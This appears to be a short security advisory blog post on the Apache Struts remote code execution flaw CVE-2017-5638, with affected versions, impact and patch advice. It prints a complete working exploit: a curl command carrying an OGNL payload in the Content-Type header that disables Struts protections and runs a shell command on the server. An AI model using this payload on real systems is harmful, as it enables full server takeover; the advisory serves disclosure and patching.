Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts 2 application, the parser attempts to process it but fails. During this failure, the framework incorrectly interprets the injected expression as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language integrated with Struts that can access and execute Java code. The vulnerability allows an attacker to craft a Content-Type header containing a malicious OGNL expression. Because the framework evaluates this expression without proper sanitization, it enables the attacker to achieve remote code execution on the underlying server with the same privileges as the Struts application. This grants complete control over the system, allowing for data theft, server compromise, or further network penetration.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-server.com/struts2-endpoint`

How Exploit:

Craft malicious HTTP request with a malicious OGNL expression in the Content-Type header. The payload is delivered without needing file upload. The server-side evaluation of the OGNL expression leads to arbitrary command execution.

Protection from this CVE:

Apply official patch. Upgrade Struts to versions 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Isolate application servers.

Impact:

Complete system compromise. Unauthorized data access. Full server control.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top